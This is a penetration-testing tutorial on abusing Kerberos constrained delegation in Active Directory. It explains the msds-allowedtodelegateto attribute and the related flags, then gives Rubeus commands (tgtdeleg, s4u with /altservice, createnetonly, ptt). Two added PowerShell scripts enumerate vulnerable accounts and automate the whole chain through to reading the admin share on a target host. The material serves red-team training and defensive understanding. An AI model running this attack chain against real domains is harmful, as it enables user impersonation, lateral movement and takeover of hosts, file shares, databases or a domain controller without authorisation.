Constrained Delegation

Constrained Delegation is a way to limit exactly which services a particular machine or account can access while impersonating other users. The "service" is a service principal name (SPN) that the account is allowed to access while impersonating other users. PowerView can help locate these attributes: the field of interest is msds-allowedtodelegateto, but the account's userAccountControl property is modified as well. Essentially, if a computer or user object has a userAccountControl value containing TRUSTED_TO_AUTH_FOR_DELEGATION (protocol transition, "use any authentication protocol"), then anyone who compromises that account can impersonate any user to the SPNs listed in msds-allowedtodelegateto. Two caveats: without that flag (the "Kerberos only" setting) the S4U2Self step returns a non-forwardable ticket, which the KDC will not accept for S4U2Proxy in classic constrained delegation, and accounts marked "sensitive and cannot be delegated" or placed in the Protected Users group cannot be impersonated this way. Benjamin Delpy mentioned that SeEnableDelegationPrivilege is required to actually modify these parameters.
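The following PowerShell is an added example, not from the original page (which used a PowerView screenshot): it enumerates every account configured for constrained delegation, decodes the TRUSTED_TO_AUTH_FOR_DELEGATION bit, and checks whether a chosen target user can be delegated at all. The Get-Domain* calls assume PowerView is loaded; the ADSI part needs only a domain-joined session. The account name jwinchester comes from the attack section below; everything else is a placeholder.

```powershell
# Added example, not part of the original page. Assumes PowerView (Recon module) is
# loaded for the Get-Domain* calls; the ADSI part needs only a domain-joined session.

# userAccountControl bits relevant to delegation.
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000   # protocol transition ("use any authentication protocol")
$NOT_DELEGATED                  = 0x100000    # "account is sensitive and cannot be delegated"

# --- With PowerView --------------------------------------------------------------
# -TrustedToAuth filters on the TRUSTED_TO_AUTH_FOR_DELEGATION bit, i.e. accounts that
# can do S4U2Self + S4U2Proxy for arbitrary users.
Get-DomainUser -TrustedToAuth -Properties samaccountname,msds-allowedtodelegateto,useraccountcontrol
Get-DomainComputer -TrustedToAuth -Properties dnshostname,msds-allowedtodelegateto,useraccountcontrol

# Accounts with the attribute set but without the bit are "Kerberos only" constrained
# delegation; they still matter when you hold a forwardable ticket from a victim.
Get-DomainUser -LDAPFilter '(msds-allowedtodelegateto=*)' -Properties samaccountname,msds-allowedtodelegateto,useraccountcontrol

# --- Without PowerView: plain ADSI -------------------------------------------------
# 1.2.840.113556.1.4.803 is LDAP_MATCHING_RULE_BIT_AND, so the first clause matches
# objects whose userAccountControl has the TRUSTED_TO_AUTH_FOR_DELEGATION bit set.
$searcher = New-Object System.DirectoryServices.DirectorySearcher
$searcher.Filter = "(|(userAccountControl:1.2.840.113556.1.4.803:=$TRUSTED_TO_AUTH_FOR_DELEGATION)(msds-allowedtodelegateto=*))"
$searcher.PageSize = 1000
[void]$searcher.PropertiesToLoad.AddRange([string[]]@('samaccountname','msds-allowedtodelegateto','useraccountcontrol'))

function Get-ConstrainedDelegationCandidates {
    foreach ($r in $searcher.FindAll()) {
        $uac = [int]$r.Properties['useraccountcontrol'][0]
        [pscustomobject]@{
            Account             = [string]$r.Properties['samaccountname'][0]
            ProtocolTransition  = [bool]($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION)
            # Exact strings the KDC compares against an S4U2Proxy request; copy one
            # verbatim into Rubeus /msdsspn, with or without the domain suffix exactly
            # as it appears here.
            AllowedToDelegateTo = (@($r.Properties['msds-allowedtodelegateto']) -join '; ')
        }
    }
}
Get-ConstrainedDelegationCandidates | Format-Table -AutoSize

# Before choosing a user to impersonate, check that they can actually be delegated:
# NOT_DELEGATED accounts and Protected Users members yield unusable S4U2Self tickets.
function Test-CanBeImpersonated([string]$SamAccountName) {
    $searcher.Filter = "(samaccountname=$SamAccountName)"
    [void]$searcher.PropertiesToLoad.Add('memberof')
    $u = $searcher.FindOne()
    if (-not $u) { throw "account $SamAccountName not found" }
    $uac = [int]$u.Properties['useraccountcontrol'][0]
    $protected = @($u.Properties['memberof']) -match '^CN=Protected Users,'
    -not (($uac -band $NOT_DELEGATED) -or $protected)
}
Test-CanBeImpersonated jwinchester
```

The AllowedToDelegateTo column is the value to copy into Rubeus: the KDC compares the SPN in the S4U2Proxy request against this list byte for byte, so whether or not a domain suffix appears here decides what must be passed later.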

What's the Risk?

If you are able to compromise an account that has SPNs set under msds-allowedtodelegateto, you can pretend to be any user you want to the target service SPN. For a HOST SPN this allows complete remote takeover. For an MSSQL SPN this allows DBA rights. A CIFS SPN allows complete remote file access. An HTTP SPN would likely allow takeover of the remote web service, and LDAP (on a domain controller) allows DCSync. HTTP/MSSQL service accounts, even if they are not elevated admins on the target, can possibly be abused with Rotten Potato (which relies on the SeImpersonatePrivilege that service accounts typically hold) to elevate to SYSTEM.

Attack

First, let us start with PowerView. In the screenshot below you can see that the user jwick is allowed to delegate, in other words to impersonate any user and authenticate to a file service on the target.

The section to focus on is msds-allowedtodelegateto: it lists the exact SPNs jwick may present a delegated ticket to.

Now let us dump the available tickets and find the one for the account we need for the station we are trying to access. Then request a delegation TGT for the user jwick. Rubeus tgtdeleg abuses the Kerberos GSS-API delegation trick to retrieve a usable TGT for the current user without elevation, so it has to be run from a session that already runs as jwick:

Rubeus tgtdeleg

From here we use the s4u attack in Rubeus to impersonate a user that has administrator access to the machine Desktop-Delta and continue from there. We want to change the service to CIFS so that we can list directories; /altservice can do this because the service name in a ticket sits in its unencrypted part, so Rubeus can rewrite it after S4U2Proxy:

Rubeus s4u /ticket:<Ticket from TGTDELEG> /domain:dominioncyber.local /impersonateuser:jwinchester /msdsspn:http/desktop-delta.dominioncyber.local /dc:dominioncyberdc.dominioncyber.local /ptt /altservice:cifs

The value passed to /msdsspn must match an entry in the account's msds-allowedtodelegateto exactly, since the KDC compares the requested SPN against that list. If the entry is listed without a domain suffix, REMOVE THE DOMAIN FROM THE MSDSSPN. Be careful: sometimes the msdsspn value is displayed wrapped in double quotes (" ").

Once we receive the "Ticket successfully imported!" message, we can copy the second ticket from the output (the final S4U2Proxy service ticket) for later use if needed. Remember that these tickets are time based and expire with their ticket lifetime.

From here we can create a new process with Rubeus, inject the ticket into that process's logon session, and use it for network actions.

Administrator privileges are needed from here, since applying a ticket to a different logon session (by LUID) requires elevation; this is only needed to perform the network actions that follow.

Rubeus createnetonly /program:C:\Windows\System32\cmd.exe

Note the LUID printed by createnetonly, then ptt the ticket into that logon session using the LUID.

Now impersonate (use) the new process for the network actions.

And for some strange reason I would receive something like this

So I did some research and found that ired.team had the same issue and requested the ticket in a different way, by removing the DOMAIN from the msdsspn section:

/impersonateuser:jwinchester /msdsspn:cifs/DESKTOP-DELTA /ptt

[Removed some sections of the original command]

By making that change I managed to enumerate the shares, as I am aware jwick is an Administrator on station Delta.
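The complete chain, as an added example rather than the page's own command sequence: it runs from a PowerShell prompt on a host where the session already runs as jwick, parses the base64 kirbi blobs out of Rubeus output, uses the /msdsspn form that worked above, and includes the optional sacrificial-process variant. The Rubeus path and the use of /nowrap and /show are assumptions; host, user and domain names are the page's. A /msdsspn value that does not match msds-allowedtodelegateto fails at the S4U2Proxy step with KDC_ERR_BADOPTION, which the script checks for.

```powershell
# Added example, not the page's own command sequence. Assumes Rubeus.exe is in the
# current directory and this PowerShell session already runs as jwick.

$Rubeus = '.\Rubeus.exe'
$Domain = 'dominioncyber.local'
$DC     = 'dominioncyberdc.dominioncyber.local'

# Pull base64 kirbi blobs (they start with "doI", the ASN.1 KRB-CRED header) out of
# Rubeus output; /nowrap keeps each blob on a single line so one regex catches it.
function Get-KirbiBlobs([string[]]$Output) {
    @($Output | Select-String -Pattern '^\s*(doI[A-Za-z0-9+/=]+)\s*$') |
        ForEach-Object { $_.Matches[0].Groups[1].Value }
}

# 1. TGT for the current user (jwick) via the GSS-API delegation trick; no elevation needed.
$tgt = @(Get-KirbiBlobs (& $Rubeus tgtdeleg /nowrap))[0]
if (-not $tgt) { throw 'tgtdeleg returned no ticket; is this session running as jwick?' }

# 2. S4U2Self as jwinchester, then S4U2Proxy to the allowed SPN.
#    /msdsspn must match an entry in jwick's msds-allowedtodelegateto exactly (here the
#    entry has no domain suffix). /ptt imports the result into this logon session, which
#    needs no elevation. Add /altservice:host,http to also get HOST/HTTP tickets for the
#    same host; Rubeus then prints one blob per service.
$s4uOut = & $Rubeus s4u "/ticket:$tgt" /impersonateuser:jwinchester /msdsspn:cifs/DESKTOP-DELTA "/domain:$Domain" "/dc:$DC" /ptt /nowrap
$s4uOut
if ($s4uOut -match 'KDC_ERR_BADOPTION') {
    throw '/msdsspn does not match msds-allowedtodelegateto; copy the attribute value verbatim'
}
# The last blob in s4u output is the final S4U2Proxy service ticket; keep it for reuse
# while it is still within its lifetime.
$serviceTicket = @(Get-KirbiBlobs $s4uOut)[-1]

# 3. Verify and use: klist should show cifs/DESKTOP-DELTA with Client = jwinchester, and
#    the share listing works because the impersonated user is an admin on the host.
klist
dir \\DESKTOP-DELTA\C$

# 4. Optional: keep this session clean by parking the ticket in a sacrificial logon
#    session instead. This part needs an elevated prompt, because ptt /luid targets
#    another logon session.
$net  = & $Rubeus createnetonly /program:C:\Windows\System32\cmd.exe /show
$luid = ($net | Select-String -Pattern 'LUID\s*:\s*(0x[0-9A-Fa-f]+)').Matches[0].Groups[1].Value
& $Rubeus ptt "/luid:$luid" "/ticket:$serviceTicket"
# Network actions typed into the spawned cmd.exe now use jwinchester's ticket, while
# this PowerShell session keeps only what step 2 imported.
```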
